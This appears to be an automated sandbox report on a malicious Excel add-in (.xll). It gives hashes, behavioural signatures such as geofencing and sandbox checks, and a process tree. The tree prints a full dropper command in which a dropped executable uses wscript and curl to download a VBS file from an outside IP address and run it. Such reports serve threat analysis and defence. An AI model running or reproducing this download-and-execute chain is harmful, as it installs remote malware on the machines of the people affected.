Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 03:08

General

  • Target

    98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll

  • Size

    50KB

  • MD5

    8866d0e530cb613fde59c5476ea6c331

  • SHA1

    e77beeb201303b739a9c4536514e48adc2118900

  • SHA256

    98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f

  • SHA512

    73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea

  • SSDEEP

    1536:9lnq2U5JsS6Nh5wFXscKjrtN/5zqGyiNwmHWR03aY:9c9HQNh5wFXscKXHRzaiNnVqY

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Users\Public\me.exe
      C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\users\public\1.vbs
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Windows\system32\curl.exe
          C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/123
          4⤵
            PID:2780
          • C:\Windows\system32\timeout.exe
            timeout 10
            4⤵
            • Delays execution with timeout.exe
            PID:2052
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\users\public\1.vbs"
            4⤵
              PID:4344

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll

        Filesize

        50KB

        MD5

        8866d0e530cb613fde59c5476ea6c331

        SHA1

        e77beeb201303b739a9c4536514e48adc2118900

        SHA256

        98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f

        SHA512

        73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea

      • C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll

        Filesize

        50KB

        MD5

        8866d0e530cb613fde59c5476ea6c331

        SHA1

        e77beeb201303b739a9c4536514e48adc2118900

        SHA256

        98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f

        SHA512

        73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea

      • C:\Users\Public\me.exe

        Filesize

        14KB

        MD5

        0b4340ed812dc82ce636c00fa5c9bef2

        SHA1

        51c97ebe601ef079b16bcd87af827b0be5283d96

        SHA256

        dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

        SHA512

        d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

      • C:\Users\Public\me.exe

        Filesize

        14KB

        MD5

        0b4340ed812dc82ce636c00fa5c9bef2

        SHA1

        51c97ebe601ef079b16bcd87af827b0be5283d96

        SHA256

        dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

        SHA512

        d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

      • memory/2204-23-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-11-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-6-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-25-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-7-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-27-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-10-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-26-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-12-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-13-0x00007FFDF73E0000-0x00007FFDF73F0000-memory.dmp

        Filesize

        64KB

      • memory/2204-15-0x00007FFDF73E0000-0x00007FFDF73F0000-memory.dmp

        Filesize

        64KB

      • memory/2204-16-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-17-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-18-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-19-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-20-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-21-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-22-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-1-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-24-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-8-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-5-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-9-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-28-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-29-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-30-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-4-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-2-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-3-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-37-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-0-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-43-0x00007FFE33B50000-0x00007FFE33B65000-memory.dmp

        Filesize

        84KB

      • memory/2204-57-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-60-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-59-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-62-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-61-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-58-0x00007FFDF9B30000-0x00007FFDF9B40000-memory.dmp

        Filesize

        64KB

      • memory/2204-63-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-64-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB

      • memory/2204-65-0x00007FFE39AB0000-0x00007FFE39CA5000-memory.dmp

        Filesize

        2.0MB